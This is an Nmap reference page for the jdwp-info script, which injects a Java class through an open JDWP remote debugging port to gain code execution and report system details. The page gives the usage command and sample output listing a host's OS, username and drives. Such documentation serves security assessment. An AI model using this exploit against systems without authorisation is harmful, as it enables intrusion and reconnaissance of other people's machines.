Home page logo
/
Zenmap screenshot
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
Example Nmap output

File jdwp-info

Script types: portrule
Categories: default, safe, discovery
Download: http://nmap.org/svn/scripts/jdwp-info.nse

User Summary

Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script injects and execute a Java class file that returns remote system information.

Example Usage

nmap -sT <target> -p <port> --script=+jdwp-info

Script Output

PORT     STATE SERVICE REASON
2010/tcp open  search  syn-ack
| jdwp-info:
|   Available processors: 1
|   Free memory: 15331736
|   File system root: A:\
|   Total space (bytes): 0
|   Free space (bytes): 0
|   File system root: C:\
|   Total space (bytes): 42935926784
|   Free space (bytes): 29779054592
|   File system root: D:\
|   Total space (bytes): 0
|   Free space (bytes): 0
|   Name of the OS: Windows XP
|   OS Version : 5.1
|   OS patch level : Service Pack 3
|   OS Architecture: x86
|   Java version: 1.7.0_01
|   Username: user
|   User home: C:\Documents and Settings\user
|_  System time: Sat Aug 11 15:21:44 CEST 2012

Requires


Author:

  • Aleksandar Nikolic

License: Same as Nmap--See https://nmap.org/book/man-legal.html

portrule

portrule (host, port)

Parameters

  • host:
  • port:

Usage:

nmap -sT <target> -p <port> --script=+jdwp-info

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]